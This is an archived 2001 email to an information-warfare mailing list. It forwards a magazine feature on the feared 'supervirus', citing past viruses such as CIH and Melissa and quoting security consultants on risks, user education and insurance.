Return-Path: <sentto-279987-3479-1004119293-fc=all.net@returns.onelist.com> Delivered-To: fc@all.net Received: from 204.181.12.215 [204.181.12.215] by localhost with POP3 (fetchmail-5.7.4) for fc@localhost (single-drop); Fri, 26 Oct 2001 11:03:07 -0700 (PDT) Received: (qmail 5591 invoked by uid 510); 26 Oct 2001 18:00:57 -0000 Received: from n5.groups.yahoo.com (216.115.96.55) by 204.181.12.215 with SMTP; 26 Oct 2001 18:00:57 -0000 X-eGroups-Return: sentto-279987-3479-1004119293-fc=all.net@returns.onelist.com Received: from [10.1.4.55] by n5.groups.yahoo.com with NNFMP; 26 Oct 2001 18:01:33 -0000 X-Sender: fc@red.all.net X-Apparently-To: iwar@onelist.com Received: (EGP: mail-8_0_0_1); 26 Oct 2001 18:01:33 -0000 Received: (qmail 56910 invoked from network); 26 Oct 2001 18:01:33 -0000 Received: from unknown (10.1.10.26) by l9.egroups.com with QMQP; 26 Oct 2001 18:01:33 -0000 Received: from unknown (HELO red.all.net) (65.0.156.78) by mta1 with SMTP; 26 Oct 2001 18:01:32 -0000 Received: (from fc@localhost) by red.all.net (8.11.2/8.11.2) id f9QI1e401961 for iwar@onelist.com; Fri, 26 Oct 2001 11:01:40 -0700 Message-Id: <200110261801.f9QI1e401961@red.all.net> To: iwar@onelist.com (Information Warfare Mailing List) Organization: I'm not allowed to say X-Mailer: don't even ask X-Mailer: ELM [version 2.5 PL3] From: Fred Cohen <fc@all.net> X-Yahoo-Profile: fcallnet Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com Delivered-To: mailing list iwar@yahoogroups.com Precedence: bulk List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com> Date: Fri, 26 Oct 2001 11:01:40 -0700 (PDT) Reply-To: iwar@yahoogroups.com Subject: [iwar] [fc:Beware.the.supervirus] Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Beware the supervirus Computing, 11-10-2001 <a href="http://www.vnunet.com/Features/1126331">http://www.vnunet.com/Features/1126331> Hoax virus warnings are as central to online culture as broken links and bust dotcoms. If you receive an email with the subject header XXX Teletubbies! delete it immediately. It will trash your hard drive and kidnap your goldfish. The fact that such warnings have achieved parody status shows just how far the virus has pervaded Net consciousness. But the proliferation of dire warnings, whether in jest or not, masks a very real fear: the possible emergence of a computer supervirus. The idea that a supervirus could knock out a large proportion of the world's computers in a matter of hours is understandably met with doubt by many. But there are signs that our scepticism is bordering on complacency. Some viruses in the wild have serious payloads indeed. In 1998, the Windows virus CIH (also known as Chernobyl) was the first to overwrite not only a user's data but also the computer's Bios, rendering machines unbootable without major surgery. At the end of 1999, the Kriz virus used a similar technique to attempt to overwrite all the files on your hard drive and replace them with nonsense. In March of this year, another Bios-blasting virus, Magistr, was detected - only this time it could propagate itself as an email worm with random subject lines, bodytext and attachment names. Fortunately, these and other outbreaks were caught at an early stage by antivirus companies, who were able to issue patches for software to their customers. And most of the viruses didn't have particularly good means of propagation in the first place, as they required users to click on an attachment. Speed freaks Melissa, I Love You, and Kournikova were all notable for the speed by which they spread across the globe's networks. In each of these cases, antivirus scanners and other security packages were quickly updated to catch future iterations, but to be effective antivirus software needs to know the signature of a virus, which means that they must have previously identified it. While it's true that some antivirus technology, using heuristic scanners, look for virus-like behaviour rather than signatures, such products are in their infancy. Many security consultants and analysts believe that it's only a matter of time before the rapid propagation of Melissa-type viruses and the destructive payload of Kriz combine to create a single, corporate-crippling supervirus. "We've seen destructive payloads, and we've seen wildly propagating viruses. At some point in the future, we will see a virus that has a combination of both," says Rob Boltman, principal consultant for security at IT consulting firm Detica. "I don't think it's inevitable, but there's certainly a high probability that it will happen," adds Andy Kellet, senior research analyst with the Butler Group. Such fears are compounded by the ever-increasing complexity of corporate IT infrastructures, none of which can be 100 per cent free of vulnerabilities. And the growing availability of point-and-click software that allows even novice hackers to create Trojan Horses and other complex viruses, represents an increasing threat. "They're becoming rather like Airfix play kits," says Kellet. High risk of havoc The reliance on a few main applications and operating systems means that the risk of a supervirus creating havoc is increased, says Neil Barrett, technical director at risk management consultancy IRM and an expert advisor to the National High-Tech Crime Unit. It wouldn't be "beyond the wit of man" to write a smart virus that is spread through Microsoft Exchange and Lotus Notes, and which relies on the main features of Office 2000 to deliver its damage, he says. "The only machines that are going to be safe are Linux and Apple, meaning that 80 per cent of systems are going to be vulnerable," he says. "Something subtly imaginative and powerful is going to get out there much faster than the anti-virus products can sweep it." However, Barrett sees some grounds for optimism. A virus writer almost always tests the ability of his creation to spread in the real world before equipping it with the dangerous payload. This gives antivirus companies a valuable warning of new strains and a chance to develop strategies to combat them, he says. In addition, virus writers are as fallible as any other programmer. "I can't think of any software that's bug free, and this software is no different," says Barrett. "I'm not going to say it will never happen, in the same way that nobody would say that the Ebola virus will never become airborne. The same sort of thing could happen on the internet with viruses, but it hasn't happened yet." Stop, there's an intruder about While a supervirus isn't out of the question, corporate IT departments should be more worried about other system intrusions that compromise security and provide a way in for viruses, say analysts. "We frequently trip across some form of monitoring device that's been deposited on a client's system and has spread throughout the network, giving hackers a back door into the system or emailing out confidential information," says Matt Tomlinson, business development director at security consultancy MIS. "Such viruses and Trojans are available on the web and many cannot be detected by anti-virus software." Education and insurance Not surprisingly, security consultants and analysts believe more investment in security is the answer. But with budget restrictions and boardroom scepticism over the precise level of risk posed by viruses, investment in security isn't always a top priority. In that case, there are other, cheaper ways to minimise security risks, says Stuart Houghton, network administrator at Amnesty International. "There's always some new viral threat that your antivirus software might not grab. The best way to combat it is to educate users and try to stop them doing the stupid things that would make a virus a threat in the first place," he says. But for those who still can't sleep at night, Tomlinson suggests a more traditional solution that doesn't involve extensive, and expensive, security audits - insurance. "Given that no system can ever be 100 per cent secure, and insurance is all about pooling risk, I think that's the direction we'll see the market going," he says. ------------------------ Yahoo! Groups Sponsor ---------------------~--> Get your FREE VeriSign guide to security solutions for your web site: encrypting transactions, securing intranets, and more! http://us.click.yahoo.com/UnN2wB/m5_CAA/yigFAA/kgFolB/TM ---------------------------------------------------------------------~-> ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-12-31 20:59:57 PST